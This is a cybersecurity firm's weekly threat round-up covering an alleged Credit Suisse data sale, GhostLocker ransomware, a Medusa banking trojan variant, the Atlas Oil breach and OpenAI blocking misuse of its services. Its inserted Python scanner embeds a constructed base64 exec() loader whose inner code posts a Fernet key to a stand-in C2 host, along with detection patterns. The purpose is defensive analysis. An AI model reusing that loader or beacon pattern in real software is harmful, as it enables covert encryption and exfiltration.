
Trojan variants, ransomware and cybercriminals – how can you stay safe?

2nd Jul, 2024

This week’s Cyber Threat Round-up sees Ian Hirst examine a cybercriminal who claims to hold sensitive data belonging to a global bank, a hacktivist group turned ransomware tycoon, a banking trojan variant that is targeting the global financial sector, and a website breach at a prominent oil and fuel supply company.

Breaking News: Hacker Advertises Alleged Credit Suisse Data on Cybercriminal Forum

In a shocking development, a cybercriminal using the alias @888 has claimed to possess sensitive data belonging to the global investment bank Credit Suisse. This data breach was announced on a notorious cybercriminal forum, raising alarms within the financial services community.

What’s Allegedly in the Data?

@888 asserts that the compromised dataset includes information on 19,000 individuals. The exposed data purportedly contains:

  • Customer and employee names
  • Email addresses
  • Employee codes
  • Dates of birth
  • Genders
  • Policy names and relationships
  • Date of joining (DOJ)
  • Effective dates
  • Status and entity information

A sample image provided by @888 appears to show email addresses with the domain @credit-suisse[.]com, seemingly corroborating the hacker’s claims.

  • The Sale: The threat actor has made it clear that the dataset will be sold only once, exclusively accepting payments in Monero (XMR), a cryptocurrency favoured for its anonymity. The exact price remains undisclosed, with @888 inviting interested parties to contact them directly for negotiations.
  • Who is @888? Analysis of @888’s activities reveals that this user has been an active participant in the cybercriminal forum scene since August 18, 2023. With a positive reputation score of +1,070 and 42 positive reviews from other forum members, @888 is recognised as a reliable initial access and data broker.
  • The Unverified Claims: Despite the alarming nature of these claims, verification remains challenging. Security firm Gemserv has reported its inability to confirm the authenticity of @888’s assertions. However, the detailed description and sample provided lend some weight to the possibility that this data breach could be genuine.
  • The Implications: If these claims prove to be true, the impact on Credit Suisse and its clients could be significant, potentially leading to severe financial and reputational damage. Financial institutions, customers, and employees are urged to remain vigilant and monitor for any suspicious activities.

“Hacktivists Turn Ransomware Tycoons: The Evolution of @GhostSec and @Stormous”

In a dramatic shift from their origins, hacktivist group @GhostSec has joined forces with @Stormous to launch a potent ransomware operation. Both groups are prominent members of @TheFiveFamilies, a relatively new but formidable hacktivist collective.

Originally a pure hacktivist group, @GhostSec announced a significant pivot in October 2023 with the introduction of GhostLocker, their proprietary ransomware-as-a-service (RaaS) written in Golang. The early adopter of this service was none other than @Stormous, setting the stage for a powerful collaboration.

By early February 2024, @GhostSec released GhostLocker V2, also in Golang, boasting new features like a web panel and faster encryption. This release marked a step up in their ransomware capabilities.

On February 24th, through @TheFiveFamilies Telegram channel, a groundbreaking collaborative RaaS project was announced: STMX_GhostLocker. This new venture between GhostLocker and Stormous has since carried out joint double extortion attacks across various sectors in countries including India, Uzbekistan, Indonesia, Poland, Thailand, and Argentina. The consequences of these attacks are publicly listed on a Tor-accessible leak site, where the highest recorded ransom paid is $500,000. For those who refuse to pay, their data is made available for download.

In a surprising turn of events, @GhostSec announced in May 2024 their retirement from cybercrime, transferring all GhostLocker operations to @Stormous. This move marks another significant shift in the ever-evolving landscape of cyber threats.

  • Gemserv’s Insight: The transformation of @GhostSec from a hacktivist group to a key player in the RaaS arena signifies a clear shift towards financial motivations over political ones. Their growth and development in ransomware operations have been bolstered by the alliances formed within the @TheFiveFamilies collective. It is evident that @GhostSec’s primary focus has become ransomware operations.
  • Strategic Implications: The RaaS landscape has seen rapid evolution in recent years. Ransomware authors favour this model as it mitigates some of the operational risks and efforts, providing a consistent revenue stream. This shift is reshaping the cybersecurity threat landscape.
  • Tactical Implications: Following the release of GhostLocker V2, @GhostSec hinted at a forthcoming GhostLocker v3. Whether STMX_GhostLocker is indeed GhostLocker v3 remains uncertain, suggesting the potential for another new version on the horizon.

Recent samples of GhostLocker reveal that the ransomware is now written in Python and obfuscated with base64. It utilises the Fernet library for its encryption processes and communicates with command and control (C2) servers, enabling operators to execute further malicious commands.
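Because the recent samples are described as base64-wrapped Python that imports Fernet and beacons to C2, a defender can triage a suspect script by peeling the base64 layers and looking for that combination of indicators. The scanner below is an added example written for this round-up; it is not GhostLocker code, not Gemserv tooling, and the SAMPLE_SCRIPT it inspects is a constructed, inert stand-in for an obfuscated loader (the inner text does nothing when left unexecuted, and the scanner never executes it). The indicator names and the C2 hostname `c2.example.invalid` are assumptions chosen for the example.

```python
"""Triage a Python script for base64-wrapped payloads and decode them to reveal
indicators such as Fernet usage, filesystem traversal and network beaconing.

Added example for this round-up: not GhostLocker code and not Gemserv tooling.
The decoded text is only pattern-matched, never executed.
"""
import base64
import binascii
import re

# Constructed inner payload (assumption: our own inert text, not from any real
# sample). It carries the indicators the round-up describes: Fernet, os.walk, C2.
_INNER_PAYLOAD = """
from cryptography.fernet import Fernet
import os, requests
key = Fernet.generate_key()
f = Fernet(key)
for root, _, files in os.walk('/home'):
    pass
requests.post('http://c2.example.invalid/beacon', data=key)
"""

# Constructed outer loader: the payload above wrapped in base64 and handed to exec().
SAMPLE_SCRIPT = (
    "import base64\n"
    "exec(base64.b64decode('"
    + base64.b64encode(_INNER_PAYLOAD.encode()).decode()
    + "'))\n"
)

# Indicator patterns (assumed names); each is matched on every decoded layer.
INDICATORS = {
    "fernet_import": re.compile(r"from\s+cryptography\.fernet\s+import\s+Fernet|import\s+cryptography\.fernet"),
    "fernet_use": re.compile(r"\bFernet\s*\("),
    "filesystem_walk": re.compile(r"\bos\.walk\s*\("),
    "network_call": re.compile(r"\b(requests\.(get|post)|urllib\.request\.urlopen|socket\.connect)\s*\("),
    "dynamic_exec": re.compile(r"\b(exec|eval)\s*\("),
}

# A run of 40+ base64-alphabet characters with optional padding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _looks_like_text(s: str) -> bool:
    """True when every character is printable or ordinary whitespace."""
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def decode_base64_layers(text: str, max_depth: int = 5) -> list[str]:
    """Return every UTF-8 text layer recovered by repeatedly decoding base64 blobs."""
    layers = []
    frontier = [text]
    for _ in range(max_depth):
        next_frontier = []
        for chunk in frontier:
            for match in B64_BLOB.finditer(chunk):
                try:
                    raw = base64.b64decode(match.group(0), validate=True)
                    decoded = raw.decode("utf-8")
                except (binascii.Error, ValueError, UnicodeDecodeError):
                    continue  # not base64, bad padding, or binary: skip it
                if _looks_like_text(decoded):
                    layers.append(decoded)
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def scan_script(source: str) -> dict[str, int]:
    """Map each indicator found to the shallowest layer index (0 = outer script)."""
    layers = [source] + decode_base64_layers(source)
    hits = {}
    for depth, layer in enumerate(layers):
        for name, pattern in INDICATORS.items():
            if name not in hits and pattern.search(layer):
                hits[name] = depth
    return hits


def verdict(hits: dict[str, int]) -> str:
    """Fernet plus filesystem traversal hidden inside an encoded layer is the red flag."""
    encoded = {name for name, depth in hits.items() if depth > 0}
    if {"fernet_use", "filesystem_walk"} <= encoded:
        return "suspicious: encoded layer combines Fernet encryption with filesystem traversal"
    if encoded:
        return "review: encoded layer contains " + ", ".join(sorted(encoded))
    return "clean"


if __name__ == "__main__":
    found = scan_script(SAMPLE_SCRIPT)
    print(found)
    print(verdict(found))
```

The scoring deliberately weights indicators that appear only after decoding: an outer script that merely imports Fernet is unremarkable, whereas a Fernet constructor and an os.walk() that only surface once a base64 blob is peeled is worth an analyst's time. Running the file prints the indicator map for the constructed sample and the resulting verdict.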

Stay vigilant and informed as the dynamics of ransomware and cyber threats continue to evolve.

“Medusa Strikes Again: New Banking Trojan Variant Targets Global Financial Sector”

The financial sector has long been a prime target for cyber criminals, given its critical role in the global economy and the wealth of sensitive data it holds. From the early days of phishing schemes to sophisticated malware attacks, banks and financial institutions have continuously faced an onslaught of cyber threats. In this context, researchers have identified a new variant of the Medusa banking Trojan, signalling a fresh wave of attacks starting from July 2023.

The latest variant of Medusa introduces several significant changes, including a lightweight permission set and the ability to display full-screen overlays and remotely uninstall applications. This campaign has cast a wide net, targeting countries such as Canada, Spain, France, Italy, the United Kingdom, the United States, and Turkey.

One of the notable changes in this new variant is the infection chain. Threat actors are now experimenting with droppers that use fake update lures delivered via SMS phishing (smishing). This shift in technique highlights the evolving nature of cyber threats and the relentless innovation of cyber criminals.

Researchers have identified five active botnets associated with this campaign, each utilising different decoys, distribution methods, and targeting strategies. These botnets are believed to be operated by different affiliates, adding to the complexity and reach of the campaign.

  • Gemserv’s Insight: It’s important to note that the Medusa banking Trojan is distinct from both the Medusa ransomware and the Medusa botnet, with no confirmed connections between them at this time.
  • Strategic Implications: Medusa possesses a range of capabilities, including keylogging, remote control, and the ability to read and write SMS messages. Delivered through smishing, the malware is likely to use its SMS capabilities to propagate further, infecting additional numbers on compromised devices.
  • Tactical Implications: To protect against this threat, mobile phone users should exercise caution and avoid installing applications or updates from unofficial or unconfirmed sources, especially those received via SMS messages.

The banking sector must remain vigilant as cyber threats continue to evolve. The Medusa Trojan’s new variant underscores the need for robust cybersecurity measures and awareness to safeguard critical financial data from relentless cyber adversaries.

“Oil Under Siege: Atlas Oil Hit by Major Ransomware Attack, 730GB of Data Exfiltrated”

Atlas Oil, a prominent oil and fuel supply distribution company based in Houston, Texas, has confirmed it suffered a significant ransomware attack leading to substantial data exfiltration. The breach, reported on Atlas Oil’s website, occurred on May 5, 2024, and was initiated through a phishing attack.

The compromised data includes sensitive customer information such as names, email addresses, mailing addresses, phone numbers, and other identifiable details. On May 21, 2024, the ransomware group @BlackBasta listed Atlas Oil on its data leak site (DLS), subsequently publishing what it claims to be 730GB of the company’s data. This data, available for free via Tor links, includes files categorised as legal, financial, and operational, as well as customer and supplier information.

  • Gemserv’s Insight: @BlackBasta is a financially motivated, Russian-speaking ransomware group, likely formed in February 2022. The group operates a Ransomware-as-a-Service (RaaS) model, which allows affiliates to carry out attacks using the group’s ransomware.
  • Strategic Implications: Operating within the energy sector, Atlas Oil is part of a highly vulnerable industry. The global oil market’s sensitivity to disruptions means incidents like this have the potential to cause international volatility in oil prices. However, no such impact has been observed at the time of writing.
  • Tactical Implications: Atlas Oil’s confirmation notice is presented as a JPEG image of a written report, accessible via an obscurely placed weblink at the top of the company’s page. This approach likely aims to prevent search engines from indexing the content and to reduce the visibility of the compromise.

Details regarding the initial phishing attack that led to the data exfiltration remain sparse. However, this incident underscores the critical importance of robust cybersecurity measures and heightened vigilance within the energy sector.

As Atlas Oil navigates this breach, the broader industry must take heed of the evolving cyber threat landscape and bolster defences to protect against similar attacks.

“The Geopolitics of AI: Navigating the Complex Landscape of Technology Access Amid Election Security Concerns”

In an unprecedented move, OpenAI has announced its decision to restrict access to its AI services in China, Russia, and Iran. This strategic decision highlights the increasingly intertwined relationship between technological advancement, geopolitical tensions, and the security of democratic processes. OpenAI, renowned for its AI-driven platform ChatGPT, cited the need to halt influence campaigns and cybercrime emanating from these regions as a key motivator for its actions. Additionally, the broader context involves U.S. government policies aimed at curtailing the flow of American AI technologies to certain international markets.

The technical underpinnings of this situation are deeply rooted in cybersecurity concerns. OpenAI has actively disrupted operations in these countries that sought to misuse its services for generating phishing emails and malicious scripts. This proactive stance is part of a broader effort to prevent the manipulation of public opinion and safeguard electoral integrity, not only in the U.S. but also in other democracies such as the UK.

Recent intelligence reports indicate that hostile nation-states are actively engaging in disinformation campaigns aimed at disrupting the upcoming UK general election, using digital platforms to spread false narratives. These actors employ a variety of tactics to undermine democratic integrity:

  • Disinformation Campaigns: Fabricating or distorting information to mislead voters and create social divisions.
  • Cyber Attacks on Election Infrastructure: Targeting voter registration databases and electronic voting systems to manipulate voter data or disrupt the voting process.
  • Social Media Manipulation: Using bots and trolls to amplify divisive content and fake news to influence public opinion and voter behaviour.
  • Phishing Attacks: Targeting political parties and election officials with deceptive emails to steal sensitive information or gain unauthorised access to internal systems.
  • Deep Fakes: Utilising AI to create hyper-realistic but entirely fabricated audiovisual content to discredit political figures or mislead voters about their policies and actions.

From a technical perspective, OpenAI utilises advanced algorithms and compliance systems to monitor and manage API traffic. This enables the firm to detect and respond to suspicious activities potentially linked to cyber threats. The implications of such technological control are significant, not only in terms of cybersecurity but also for the global AI technology landscape and the integrity of electoral processes.

Companies that leverage OpenAI’s technology internationally may face operational uncertainties. For instance, users of Vercel, a cloud company with a regional edge network that includes Hong Kong, have received notifications similar to those directed at users in the aforementioned countries. This raises questions about the ripple effects on companies headquartered in the U.S. but operating globally.

Furthermore, the U.S.-China tech war continues to escalate, with recent U.S. restrictions on the export of advanced AI chips to China marking a significant development. These geopolitical manoeuvres aim to curtail Beijing’s technological ascendance, especially in AI. In response, China is increasingly turning towards domestic innovations to reduce its dependency on foreign AI technologies, though the effectiveness and quality of these indigenous technologies remain under scrutiny.

The strategic decoupling of AI services as seen in OpenAI’s recent moves is a bellwether for the future of international tech relations. It underscores a world where technology access is becoming a new frontier in geopolitical strategy, affecting everything from business operations to international diplomacy and election security. As nations and companies navigate this complex terrain, the intersection of technology, security, and international policy will undoubtedly shape the future of global AI deployment and its role in protecting democratic values.

Authors

Ian Hirst

Partner, Cyber Threat Services
